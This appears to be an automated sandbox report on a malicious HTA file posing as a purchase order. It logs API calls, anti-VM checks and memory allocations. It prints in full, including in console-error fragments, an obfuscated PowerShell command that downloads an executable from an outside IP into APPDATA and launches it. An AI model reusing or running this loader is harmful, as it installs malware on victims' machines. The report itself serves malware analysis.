Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 11, 2024, 10:04 a.m.	Nov. 11, 2024, 10:10 a.m.

Size	17.5KB
Type	HTML document, ASCII text, with very long lines
MD5	`ae1d170677ac0a614ed5d88b943c7635`
SHA256	`e62061d984fda6be6d10edf1131454a5c81ead30c4440a75bd3ba80b1b83b099`
CRC32	`1EFBA6CE`
ssdeep	`192:F5sOwRdhB9NyK9KFTtJOyJ4YyuQSzTyW1gWHgNWvWk+gyVMOQE8JHumvNgczc:8O2hlatJOyJ4YyGgCGgyVEtzvNgczc`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\PO-54752454235.hta
1880
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KMIhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (KMIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18410,18418,18415,18407,18410,18410,18407,18410,18414,18410,18408,18466,18461,18467,18458,18408,18481,18436,18477,18483,18479,18461,18430,18472,18429,18426,18467,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + 'xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnSvy;
  2080

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.196.11.151	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:05 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 11, 2024, 10:05 a.m.			0	0

Command line console output was observed (50 out of 76 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: At line:1 char:444 console_handle: 0x00000053	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqa console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: uI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Star console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: t-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18 console_handle: 0x00000077	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = Ne console_handle: 0x00000083	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: w-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,184 console_handle: 0x0000008f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 66,18462,18471,18477));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net console_handle: 0x0000009b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: .SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KM console_handle: 0x000000a7	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: IhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return console_handle: 0x000000b3	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (K console_handle: 0x000000bf	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: MIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18 console_handle: 0x000000cb	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 7,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + ' console_handle: 0x000000ef	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnS console_handle: 0x000000fb	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: vy; console_handle: 0x00000107	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000113	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000011f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th console_handle: 0x0000013f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: e remote server" console_handle: 0x0000014b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: At line:1 char:518 console_handle: 0x00000157	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqa console_handle: 0x00000163	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: uI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Star console_handle: 0x0000016f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: t-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18 console_handle: 0x0000017b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = Ne console_handle: 0x00000187	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: w-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,184 console_handle: 0x00000193	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 66,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.Secur console_handle: 0x0000019f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: ityProtocolType]::TLS12;$G = $gu.DownloadData <<<< ($Nd);return $G};function KM console_handle: 0x000001ab	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: IhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return console_handle: 0x000001b7	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (K console_handle: 0x000001c3	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: MIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18 console_handle: 0x000001cf	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 7,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + ' console_handle: 0x000001f3	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnS console_handle: 0x000001ff	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: vy; console_handle: 0x0000020b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000217	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000223	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x00000243	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: Parameter name: bytes" console_handle: 0x0000024f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: At line:1 char:52 console_handle: 0x0000025b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: + function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes <<<< ($Jz, $G)};function console_handle: 0x00000267	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True console_handle: 0x00000273	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: ){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18 console_handle: 0x0000027f	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$g console_handle: 0x0000028b	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: u = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,184 console_handle: 0x00000297	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: 69,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net console_handle: 0x000002a3	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: .SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KM console_handle: 0x000002af	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: IhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return console_handle: 0x000002bb	1	1
WriteConsoleW Nov. 11, 2024, 10:05 a.m.	buffer: $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (K console_handle: 0x000002c7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cde8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036c728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d1a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d1e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d1e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d1e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036d1e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 11, 2024, 10:05 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 165 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02450000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02533000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02534000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02535000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02593000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02594000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
